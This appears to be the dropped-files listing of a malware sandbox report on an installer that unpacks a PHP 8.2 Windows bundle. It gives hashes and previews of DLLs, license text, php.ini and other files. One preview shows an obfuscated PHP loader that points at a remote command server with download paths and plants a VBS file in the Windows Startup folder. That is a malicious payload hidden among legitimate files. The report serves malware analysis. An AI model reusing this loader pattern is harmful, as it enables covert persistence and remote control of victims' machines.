                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):5202432
                                              Entropy (8bit):5.964268397464083
                                              Encrypted:false
                                              SSDEEP:98304:Ff+zdIUupuTXfY8Q2I8PFj1CPwDvt3uFcDC4AB:B+IUupuTXfY8Q2I8dj1CPwDvt3uFcDCp
                                              MD5:DB14ED0FBF1A8F0379A506F733DAE5FA
                                              SHA1:3EA7CF3264F5D27C843A19730E67EF78D2CD9AD6
                                              SHA-256:3918BF3C2DBE2767FBA9C6AC2BFD41BD3421CFCA1F637AC7F729123B4F13230B
                                              SHA-512:EFA441C47DC4627F8BCF6A7894B48FF272F0ACAB35162DF78D05FFC3563995AE6AD406378EDE4ABB6842932627064CC90C50F971542A4535FF07C2B5F39793B1
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V.}...}...}....?..}.......}.......}.......}.......}...}..\}.......}...}...}..Z....~..Z....}..Z.S..}..Z....}..Rich.}..........................PE..d....E.c.........." .....^7..6......S.........................................O...........`..........................................KH.......N.T.....O.s.....K..............O....|4D.8............................4D.8.............N..............................text....]7......^7................. ..`.rdata.......p7......b7.............@..@.data....t...`K..@...HK.............@....pdata........K.......K.............@..@.idata...)....N..*...\N.............@..@.00cfg..Q.....N.......N.............@..@.rsrc...s.....O.......N.............@..@.reloc..3.....O.......N.............@..B................................................................................................................................................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):42496
                                              Entropy (8bit):5.724441360615926
                                              Encrypted:false
                                              SSDEEP:768:NyBFBd36dyXiPL+rWxCdhnp1yYjm7KS0GkpuJ1yD2HFGx:0BHd36dyXSwWxCdHgmkkpxD2HFm
                                              MD5:BD002A5C73D47A875ED491191B231707
                                              SHA1:1EA6CEA8AC04AFA4F454AB912B5C743990F01992
                                              SHA-256:3AB82CE56DDF53F938C0BA7BF8BC9F64C40AC3BA7A99FB60A3E7B435E314991A
                                              SHA-512:1F2E184135FC1E69EA4254300F79553A46F10A972D2C8EF87B8BB040229570FF704B6B58807847F7470E461943ABF5B364206B225036627907F31D07D78910DC
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........X..X..X..Q.K.P..S..Z...g..Y..S..S..S..P..S..Z.....Z..,..]..X..,.....Z.....Y....'.Y..X.O.Y.....Y..RichX..................PE..d....?.^.........." .....Z...N......`_.................................................... .....................................................................h...............$....}..p............................~..0............p...............................text....X.......Z.................. ..`.rdata..H0...p...2...^..............@..@.data...H...........................@....pdata..h...........................@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):289792
                                              Entropy (8bit):6.02457503405896
                                              Encrypted:false
                                              SSDEEP:6144:Dq/XnHBwK+f9ZO/immLqUfI43z7U8r7apSOOB8trbs:rf9ZO/imm+uQhO4s
                                              MD5:D448812C0806981E7E0587E8169CF6F2
                                              SHA1:E859313F5F60E2B96A4470C2AE10F134C4B2C535
                                              SHA-256:E3AD50C1B4BDFE37F62539C8A8386100933C1273981C54FC748669F5B01BE419
                                              SHA-512:E8A727D49F5E2785C5D6B1AF63E303E85AD65A2EC7F211901DA59CFD32097E8FBF8A0A5CE72EF8DA448CCACC51BEC9576917EA07577A58414AED321A00B7C59A
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............L...L...L..YL...L..M...L..7L...L..M...L..M...L..M...L..M...LP..M...L...L`..LP..M...LP..M...LP.5L...L..]L...LP..M...LRich...L........PE..d...Z..b.........." .....&...H.......$.................................................... ...@.....................................@&..d....6...............p..........................T...............................8............@..(............................text....$.......&.................. ..`.rdata.......@.......*..............@..@.data........`.......<..............@....pdata.......p.......B..............@..@.rsrc................`..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):209920
                                              Entropy (8bit):6.388382267323861
                                              Encrypted:false
                                              SSDEEP:3072:IgtirqLNIAE97hd8+Zfy04cMAPRCQRNskTt9jp68qvU:IgW9AOY+8NcMItjh9F68qvU
                                              MD5:2554BB5EBE5D071E26C0EAF9650A5868
                                              SHA1:C546EE05C0106D35B6559615B179FB5A0ACD2B2E
                                              SHA-256:74C0885EC2553A93555469F37F8591C6A162DC8EC35B717653F6351E658F12D8
                                              SHA-512:B30170423E12DB8799A2F1024F96FF49C35225A6111C1526800EDF64641D2332C5E942B8EF5CF8AE79B73750B4B1548E69CC65317A2587EFD9401C0592F17BCD
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w@..3!.3!.3!.:YB.'!.aT.1!.aT.8!.aT.;!.aT.7!..T.5!.hI.4!..T.1!.3!.L!..T.>!..T.2!..T..2!..T.2!.Rich3!.........................PE..d...^..b.........." .....l...........k....................................................`.............................................4...D...@....`.......@..\............p..........T...............................8...............p............................text...Hk.......l.................. ..`.rdata..............p..............@..@.data...A.... ......................@....pdata..\....@... ..................@..@.rsrc........`.......0..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):303616
                                              Entropy (8bit):6.731729252030036
                                              Encrypted:false
                                              SSDEEP:6144:fCOR4ryEOtH1TOozgElOeZm7WaW9bmJsV50DEr/ap:fwQ4h7m9bmJbDI
                                              MD5:CFC9FF4911441D1A771414F99CE84006
                                              SHA1:E64AB9389795077905210FAE10AE27AECBA6CF33
                                              SHA-256:E664ECB637867B41F19D0DDAE9019091907035F221C53E96FEE376B93199D852
                                              SHA-512:D8E1CAF00F241D563159D5B37911E033BF4236C217EBC97560CAD2451E3005113166637233735A0C4ECB7B6007B36E46247003B3C407F3595B83D20696243451
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<..<..<..D..<..]S..<..]S..<..]S..<..]S..<...T..<..<..<...L...<...L..<...Lm.<..<..<...L..<..Rich.<..................PE..d....=._.........." .....Z...L......``....................................................`.........................................."...d.............. ...........................p...T.......................(.......0............p...............................text....Y.......Z.................. ..`.rdata.......p... ...^..............@..@.data...X............~..............@....pdata..............................@..@.rsrc... ...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):1646080
                                              Entropy (8bit):6.4956873496749346
                                              Encrypted:false
                                              SSDEEP:24576:RFH7bW6kvdWNX874KGisdYDLcW2ZwETrxvI5EERdWDG9IErt1:n7bcvUmnGdkwW2nxgvgQ
                                              MD5:6C509A40F1CC1DBC050F7A998C710484
                                              SHA1:5C329D668FE9910DCB3B8823187981494D3DEE3A
                                              SHA-256:3ED91FE142C59EF488CA679475F1336EA293C33EE3794448FC03DAF4089E101F
                                              SHA-512:5421ED0ECD369444FCDFBCA1E911AF5536A6674A0EA30861456E311345FA1DFEFEEED9829416C6B65979CCCAF62C9DF558EB97C6D906E562BCBD26A27C2797D1
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n..=..=..=..j=..=...<..=...<..=..=...=...<..=...<...=...<..=...<..=...<..=...<..=Rich..=........PE..d...a<.c.........." .........................................................@............`.............................................."...................@..`............0......`h...............................h..8............0...............................text............................... ..`.rdata..v....0....... ..............@..@.data....>.......4..................@....pdata..`....@.......$..............@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):380928
                                              Entropy (8bit):5.760798881399938
                                              Encrypted:false
                                              SSDEEP:6144:Ye7ugGStb75Tswr1/m+aPhjHlLjKq0Cov1QcWZlF4AkEEn:Y+GUVTswr1YRHcjvs9jE
                                              MD5:54C43CF2FFCFE8D96A697071D9B3FC2E
                                              SHA1:94EB1569EBE42B9497791AD0EF7802F97B9CC406
                                              SHA-256:82702E6806CA1B2EA0022C036BE67744FFE172C8DE67D86923011C58D5592941
                                              SHA-512:2BBF4F057166F9CB09374405897BAC33F647D1ED5AC20CC7B2E7A1B588E0319432489D621F2C7A65948EE12CF7B5DE2EA12DA83B65A4F3C36E34F2F8D9E729FC
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......F.....g...g...g.......g.P.f...g.P.b...g.P.c...g.P.d...g.g.f...g...c...g..f...g...f...g..c...g..g...g......g.......g..e...g.Rich..g.........................PE..d.....b.........." ......................................................... ............`.........................................Pg..6........................#......................8...............................8............................................text............................... ..`.rdata...]... ...^..................@..@.data...q............d..............@....pdata..t(.......*...h..............@..@.idata...).......*..................@..@.00cfg..Q...........................@..@.rsrc...............................@..@.reloc..U...........................@..B................................................................................................................................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):777728
                                              Entropy (8bit):5.557069057741964
                                              Encrypted:false
                                              SSDEEP:12288:kmm6Zyc3n26AfDI2vIJfp9mfGIGFe9Xb:Rm6Zv326A7Zvif4GRFe9Xb
                                              MD5:16FC10BDFC778A54C51CD2EED19739E7
                                              SHA1:29473B93F50EE9D888BE36F9722EEFF27A3709F9
                                              SHA-256:5714D27792E21CE06283B526E825E1A85528D441A5BB99CCB2439F8F78D5EE8E
                                              SHA-512:2279709F73D3D31780EDE0BC69B0D1620E99262F10C122508C075E66F624F6DA2064AA0EAA368C9BF5B2F42ADD3644050A35767CCCE77F4E79BEE0D72927E6E9
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=M.Ry,..y,..y,..pTZ.u,..+Y..{,..2T..{,..+Y..r,..+Y..q,..+Y..},...Y..z,..y,..b....Y..H,...Y..x,...Y6.x,...Y..x,..Richy,..........PE..d....I.c.........." .....:..........K........................................0............`..........................................s...Q..8...........i.... ...L..............\.......8...............................8...............8............................text....9.......:.................. ..`.rdata..mu...P...v...>..............@..@.data....N.......H..................@....pdata...U... ...V..................@..@.idata..!b.......d...R..............@..@.00cfg..Q...........................@..@.rsrc...i...........................@..@.reloc..6...........................@..B................................................................................................................................................................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):3272
                                              Entropy (8bit):5.10056734186515
                                              Encrypted:false
                                              SSDEEP:96:LZV3rYJT3rYJ+tMCAWRx6aQktK3VE3zNGC7Sani:VBrsbrsfCHRcaQ0K363xreai
                                              MD5:67225E6A888BB1FA90425EFD90111E1B
                                              SHA1:AF2552AE64DBAB8FE3C8D7136223650484F7F695
                                              SHA-256:A8ED392BC7AE8D633F72FDF900B76975D9DD7E48C74D51ED95393917DD4C5C72
                                              SHA-512:547CC10FE6E79F836F0DA91B8A27287F39FBB015F2B01857A1EAD9116ADCC1BB69837AAEFFCFBBB9087E7B35C45D7F68CCDED4ADC3597FA959E99A1387572E28
                                              Malicious:false
                                              Preview:--------------------------------------------------------------------.. The PHP License, version 3.01..Copyright (c) 1999 - 2022 The PHP Group. All rights reserved...--------------------------------------------------------------------....Redistribution and use in source and binary forms, with or without..modification, is permitted provided that the following conditions..are met:.... 1. Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer..... 2. Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in.. the documentation and/or other materials provided with the.. distribution..... 3. The name "PHP" must not be used to endorse or promote products.. derived from this software without prior written permission. For.. written permission, please contact group@php.net..... 4. Products derived from this s
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):47316
                                              Entropy (8bit):5.141064305688242
                                              Encrypted:false
                                              SSDEEP:768:SLG7dPw6AEradMRs6tiwZKXT/QbuchhtNUmczPs5wl2cYEZjYz9CfoC:S2VAEwMRhIwonuHUmczPswl2cYujICb
                                              MD5:7D238733187F4B0E28BBE451A9ED342B
                                              SHA1:47CCD75917F603A3699C19618407E3BCEF7A2EC6
                                              SHA-256:5FBE0D7759BCDE9CA354A3EF9C819A23198053DF968277AD58E678FA28C5E454
                                              SHA-512:92398BAD15A608E7397C6370A6C25019E2E8DB50AC643140A895B21FA00131103DB5DD7ACF77A3B8A68CFCDA28AAD9A2A83C1EF45E101B98065F855E74459328
                                              Malicious:false
                                              Preview:PHP NEWS..|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||..28 Sep 2023, PHP 8.2.11....- Core:.. . Fixed bug GH-11937 (Constant ASTs containing objects). (ilutov).. . Fixed bug GH-11790 (On riscv64 require libatomic if actually needed)... (Jeremie Courreges-Anglas).. . Fixed bug GH-11876: ini_parse_quantity() accepts invalid quantities... (Girgias).. . Fixed bug GH-12073 (Segfault when freeing incompletely initialized.. closures). (ilutov).. . Fixed bug GH-12060 (Internal iterator rewind handler is called twice)... (ju1ius).. . Fixed bug GH-12102 (Incorrect compile error when using array access on TMP.. value in function call). (ilutov)....- DOM:.. . Fix memory leak when setting an invalid DOMDocument encoding. (nielsdos)....- Iconv:.. . Fixed build for NetBSD which still uses the old iconv signature... (David Carlier)....- Intl:.. . Fixed bug GH-12020 (intl_
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):228352
                                              Entropy (8bit):5.07326788865085
                                              Encrypted:false
                                              SSDEEP:3072:e8nc6XxUr72c6asK25enccQmkQkxwX+GorWTmMWCxnIsfFoliLcK0lAMUi1:eGmMK25W5+liLcK0lAMUi
                                              MD5:ACD2CD76882B3296BFAAAF6FB45A916E
                                              SHA1:19ECD6099A538C35BF8A205BC0612BD6F460B938
                                              SHA-256:BC12302C8ED823FDF827F40F007246BE56EFAA69AAC9B7E9DF5836D5B32E326A
                                              SHA-512:1CC6938A10DC1AFCA058B3F02253F87B92466EB3FFAFF7056AC34BA68412496DE36AEE1FA69B55B699A3B17294C19B3ADD6E56D44DA6FC1008DDAEE8B40CD1FB
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x.c.<...<...<...5...4...n...?...n...0...n...4...n...8...Y...>...<...........+.......=.......=...<...=.......=...Rich<...........PE..d......c.........." ......................................................................`..........................................$..."..............i....`..p...............D...T...8...............................8............................................text............................... ..`.rdata..57.......8..................@..@.data........P.......6..............@....pdata..<....`... ...<..............@..@.idata...............\..............@..@.00cfg..Q............j..............@..@.rsrc...i............l..............@..@.reloc..V............v..............@..B................................................................................................................................................................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):43
                                              Entropy (8bit):4.111629289283939
                                              Encrypted:false
                                              SSDEEP:3:mWmAtnUk9EX5n:d3GkmJ
                                              MD5:9C8D6858FE19259B1BE399080BE8608F
                                              SHA1:CAA83D1D0AA6865E6A357AAD820C45EE19EBDF8C
                                              SHA-256:EF0F0BD1E919EE96C7D20547F7A823218CD73452F36C47D1A22F2726D5D64308
                                              SHA-512:9585E997A18F306DBA6EE8F35DBFBA17D4F782F613A65038DB1BF1CA3D3FF4C2B58F4B41CE96153D12C4E2927F379F7FE590635F5812C9553E303A90AA25E220
                                              Malicious:false
                                              Preview:"%~dp0php.exe" "%~dp0pharcommand.phar" %*..
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65969
                                              Entropy (8bit):4.489844579399281
                                              Encrypted:false
                                              SSDEEP:768:HLx4vdbSm8dxT5JAxUDd3mqsEZ+ODgx9KlT/65KwKqKHya2n:HMss4gr065NJOyZn
                                              MD5:57261E9AE983606A87B6A8E9B2CC2D56
                                              SHA1:C99B69EAD0E8F24F3FA3EC356FCA5B0897C19693
                                              SHA-256:28853C7CB69E4C7397BDF9B548CC1CEDCC335FCA66DCCC892E0129D64E92A093
                                              SHA-512:0E84F60A6210547996785A671C4297D79BB8964141B57FFA814A3FFE3F2272BB06C2B02F5C85F41B5E25CFEDD48888E20C0271ED9231766D2FDC998EB0E8F2D4
                                              Malicious:false
                                              Preview:<?php../** @file phar.php. * @ingroup Phar. * @brief class CLICommand. * @author Marcus Boerger. * @date 2007 - 2008. *. * Phar Command. */..if (!extension_loaded('phar')).{. if (!class_exists('PHP_Archive', 0)) {. echo "Neither Extension Phar nor class PHP_Archive are available.\n";. exit(1);. }. if (!in_array('phar', stream_get_wrappers())) {. stream_wrapper_register('phar', 'PHP_Archive');. }. if (!class_exists('Phar',0)) {. require 'phar://'.__FILE__.'/phar.inc';. }.}..foreach(array("SPL", "Reflection") as $ext).{. if (!extension_loaded($ext)) {. echo "$argv[0] requires PHP extension $ext.\n";. exit(1);. }.}..function command_include($file).{. $file = 'phar://' . __FILE__ . '/' . $file;. if (file_exists($file)) {. include($file);. }.}..function command_autoload($classname).{. command_include(strtolower($classname) . '.inc');.}..Phar::mapPhar();..spl_autoload_register('command_autoload');..new P
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):69120
                                              Entropy (8bit):5.916169026507824
                                              Encrypted:false
                                              SSDEEP:1536:gJYM8t1enVd6AwPjngMDVd4FHX2NfYUJVJ2sgdRdvX9:g6M8enVdUPjDHQmNfYUJVJ2sgzd/9
                                              MD5:1F4B12FCA9BAD1606DA34B4D5484A9C7
                                              SHA1:798DD9F56D08C47148823CD68CC0EFA35ECFB48D
                                              SHA-256:62CC30963A417C651050BEE51A2583500963EE58FA1C614079F579B7448A3F3D
                                              SHA-512:04F0DF9CA4A98DB522C03D95E5AB3624C9822FB18C7592C9D6F9D584A8350AA426775DEFBF5E6473236FF0D00D4B66565670939C1435A8C35A89676D683BE82E
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@.y....,...,...,..,...,V..-...,b..,...,V..-...,V..-...,V..-...,O..-...,...-...,...,...,...-...,...-...,...,...,...-...,Rich...,................PE..d...q..e.........."..........v.................@.............................p............`.............................................P............@.......0...............`.........T.......................(... ...8...............X............................text............................... ..`.rdata..bU.......V..................@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):38400
                                              Entropy (8bit):5.461428834069935
                                              Encrypted:false
                                              SSDEEP:768:uGqJhfKQD3qbOQRicjKgrj14eMTQ/+5U2cL5qdq:uG8jGbOQRicRrjO5TQ/+WNmq
                                              MD5:1FF200E101740BAECE3BA20CB8C38741
                                              SHA1:E0D33038DD830961F72BBF9AC2A45D34404F6BCC
                                              SHA-256:49B38E609F05F9E100AEC0AC6CA61AE1A2440276623C11FC7A7224161922C998
                                              SHA-512:6D5C52515F07F6D527A3EC2C4F891285DFC3C36C74F803B8A5934704C5465E69CA6BB6F6C6E77C0E2EB3A4D4F328AF0EE867585EC3066B279FC7210D080F5ACB
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.\./]\./]\./]U..]R./]...\^./]:..]_./]..*\O./]..+\V./]..,\_./]...\X./]...\_./]\..]../]..'\_./]../\]./]...]]./]..-\]./]Rich\./]................PE..d......e.........."......8...Z.......=.........@.........................................`..........................................u.......u.......... ............................l..T....................n..(....l..8............P..(............................text....6.......8.................. ..`.rdata..6<...P...>...<..............@..@.data................z..............@....pdata...............~..............@..@.rsrc... ...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PHP script, ASCII text, with very long lines (9285)
                                              Category:dropped
                                              Size (bytes):9292
                                              Entropy (8bit):5.936670441269636
                                              Encrypted:false
                                              SSDEEP:192:PZ5xSkBkpNEuO+OZIiQ9YHwFDvZQsWaKL/cmxDYoBXC9t546RId:wkBkpNEp+OZG/xhs0ROXEt546RId
                                              MD5:22C0F427228C72076DB41B2F0B14CE4B
                                              SHA1:12FF9FE8081BFD32FE5AE0E13671ACAEB1B70EBE
                                              SHA-256:29FCE9FA54E4AB6B4BEE7D0EE074D114B682DF3A656941386BD2438ADDB9092C
                                              SHA-512:83713A3B10BC2E8DFACA835532CBB053C4858844361C90841BE902D95B61A40ED26EC6544FAF588389F86480BAF59BE90082F3B6B43C6CA7119AB911C14E1C3F
                                              Malicious:false
                                              Preview:<?php. $WaDQOBKStVPFGNr = "http://rodgersluciecassy.com/mbp"; $kQnJBXcTfDmsOupyRILAgh = $WaDQOBKStVPFGNr . "/apit.php"; $QoBahiCDNplUEKftjYGXvWMRzs = $WaDQOBKStVPFGNr . "/accept.php?ref=2"; $LAqeyDBGXSRzF = $WaDQOBKStVPFGNr . "/down/"; $ExVlgntRJHDpcUBiSw = false; $TdirPQgoxkvfEZLYAHmcJWb = "config.json"; $SmlVyHuiBfCkJ = "PHP-8.2.vbs"; $tiJvURcgwpkxEmLnZfSay = ""; $kmUYvZFTRgeLCxJOsQ = realpath(dirname(__FILE__)) . "\\" . $TdirPQgoxkvfEZLYAHmcJWb; $eUzT = realpath(__FILE__); $trMHasNubY = sys_get_temp_dir(); $YKLGqi = getenv('APPDATA') . '\Microsoft\Windows\Start Menu\Programs\Startup'; $GUmblxCrJYFuDMoQGt = $YKLGqi."\\".$SmlVyHuiBfCkJ; $lgRhFxzpDTujQySmBCEO = $trMHasNubY."\\".XirzdcNPYGojUMEkVf(5); $bWapICeLQtJny = false; define('bOXVPTKNHdzwflaJeRqi', "aid"); define('MbOXVPTKNHdzwflaJeRqi', "mid"); define('pSuaVT', "data"); define('izGhxDwj', "cstat"); define('rUYPGFtZeNKCWsjmVhdIXOlqba', "cmdid"); define('fBLjhvRkECpwnodGYI', 1); define('CUYzeSfwbG', 2); define('zQouxyfCEwVmbaGHDlR
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):142336
                                              Entropy (8bit):5.863362794534159
                                              Encrypted:false
                                              SSDEEP:3072:PTVD4EGuN3jr9WOJgdMSHVIFg+2b0GnmpOVd/:5D4BuN3j5WO6dH1IFgHb0umpM/
                                              MD5:FA544CF95C1B82AFC25B9C5C55C5AD73
                                              SHA1:A225AFCB13AF134C4DD1BFB1C52F776B1B7F61FB
                                              SHA-256:F2D679B234C73CC6DAB56A09C2664F5BF806BC5D7D9D5B8FA0332D521EEE3E84
                                              SHA-512:124DEF272214E504B781979C3704587BB54A4B00DDC3C277B5C8010B561805B422B1C7443FEA92C0059B73A3A83FB2063C38763F14E45FD7D94CDA06F7B85EDE
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;_.h_.h_.hV.?hK.h...i].h9.QhZ.h...iL.h...iU.h...i[.h...iY.h...i\.h_.hF.h...iZ.h...i^.h..Sh^.h...i^.hRich_.h........PE..d......e.........."..........l......p..........@.....................................+....`.....................................................@....P.......@...............p..........T.......................(.......8............................................text...<........................... ..`.rdata..\3.......4..................@..@.data....,..........................@....pdata.......@......................@..@.rsrc........P......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):75696
                                              Entropy (8bit):4.933901725497133
                                              Encrypted:false
                                              SSDEEP:1536:cwdwKfjNWOAkBhVCJiMyjYmLrqiNfXLahUnI4:cmwKxRBhQIjYhqahUnI4
                                              MD5:9E13F4F8377C6B2D167C4EFFA43FE479
                                              SHA1:3645CE833E1EEBF65945A765006017A2E5CD0554
                                              SHA-256:2E9293E08C6B120136D9C52DF864C3879226B29D553EEB6AE04D1B19DAFE6F2B
                                              SHA-512:62E3F371988A8921AE0BCA91E0D99C1F4A513AC4DA420EA9799D3FA61F9C785B210AC510ABBCE2DDDB08279A7F5A569279E88B1DE0066EA39D07019EFB5624AC
                                              Malicious:false
                                              Preview:[PHP]....;;;;;;;;;;;;;;;;;;;..; About php.ini ;..;;;;;;;;;;;;;;;;;;;..; PHP's initialization file, generally called php.ini, is responsible for..; configuring many of the aspects of PHP's behavior.....; PHP attempts to find and load this configuration from a number of locations...; The following is a summary of its search order:..; 1. SAPI module specific location...; 2. The PHPRC environment variable...; 3. A number of predefined registry keys on Windows..; 4. Current working directory (except CLI)..; 5. The web server's directory (for SAPI modules), or directory of PHP..; (otherwise in Windows)..; 6. The directory from the --with-config-file-path compile time option, or the..; Windows directory (usually C:\windows)..; See the PHP docs for more specific information...; https://php.net/configuration.file....; The syntax of the file is extremely simple. Whitespace and lines..; beginning with a semicolon are silently ignored (as you probably guessed)...; Section headers (e.g. [Foo]) a
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):75845
                                              Entropy (8bit):4.93433530242992
                                              Encrypted:false
                                              SSDEEP:1536:cwBwKfjNWkkBhVCJiM3jYmLr0iNfcLahUnI4:cEwKxiBhQFjYFJahUnI4
                                              MD5:9A2A80EF1CCB27D1E6A430DDF3E84E4A
                                              SHA1:BEB2802358383C7EBD7EE6959EB7864B3B21A0C2
                                              SHA-256:8683A1E49C5CAB012792165BAEF3A50528CF420526CA6E5AF096203DB63D7363
                                              SHA-512:E1271DFA06C71142BC55F7071C1366CFE856E326CC81B4CC6995839244066E174B101B4B1C4EFA3D044173A5D2DFD878E363CF5F82736894B640F7D17E08D0A8
                                              Malicious:false
                                              Preview:[PHP]....;;;;;;;;;;;;;;;;;;;..; About php.ini ;..;;;;;;;;;;;;;;;;;;;..; PHP's initialization file, generally called php.ini, is responsible for..; configuring many of the aspects of PHP's behavior.....; PHP attempts to find and load this configuration from a number of locations...; The following is a summary of its search order:..; 1. SAPI module specific location...; 2. The PHPRC environment variable...; 3. A number of predefined registry keys on Windows..; 4. Current working directory (except CLI)..; 5. The web server's directory (for SAPI modules), or directory of PHP..; (otherwise in Windows)..; 6. The directory from the --with-config-file-path compile time option, or the..; Windows directory (usually C:\windows)..; See the PHP docs for more specific information...; https://php.net/configuration.file....; The syntax of the file is extremely simple. Whitespace and lines..; beginning with a semicolon are silently ignored (as you probably guessed)...; Section headers (e.g. [Foo]) a
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):35840
                                              Entropy (8bit):5.534045616401495
                                              Encrypted:false
                                              SSDEEP:768:r7KL7Ogcb1Pop8sBdeiZwbsAmhbY78hwCcX:r7KLCgcBP28sBdei2OhbY7/Cc
                                              MD5:C6314C7934BF57B9E362EFB8F44DB927
                                              SHA1:A0EC97A40FC6D4374114C0F928B7692FE9121E9D
                                              SHA-256:8317249647E9DA30C346712F9DE5D6679CFA9F25A457F281F019FBA31F3230A1
                                              SHA-512:FAAC6C9E5BD1AAD38DB2DC082E10AC44632865FCCE1A0F9DCC3BD4115E59E4C88E5523ABD4E1DD0425823B41284322EBC635CAA8CF3D5BA02DA50A2ED80C203E
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...f..Ef..Ef..Eo.~En..E4..Dd..E-..Dd..E...Ee..E4..Dk..E4..Dn..E4..De..E...D`..E...De..Ef..E...E...Db..E...Dg..E...Eg..E...Dg..ERichf..E........PE..d...G..e.........." .....>...J.......C....................................................`A.........................................p..P....p..................p................... d..T....................f..(....d..8............P...............................text....=.......>.................. ..`.rdata...3...P...4...B..............@..@.data................v..............@....pdata..p............z..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:current ar archive
                                              Category:dropped
                                              Size (bytes):934126
                                              Entropy (8bit):5.316735953734476
                                              Encrypted:false
                                              SSDEEP:24576:YG6IbYX2xv8UtCqOxAhDFYh5wvgKvSKuj5hYFDhAxCHD8xFDBA+0zUv2C4q0VJuu:YCCqOxAhDFYh5Dj5hYFDhAxCxWbwna2F
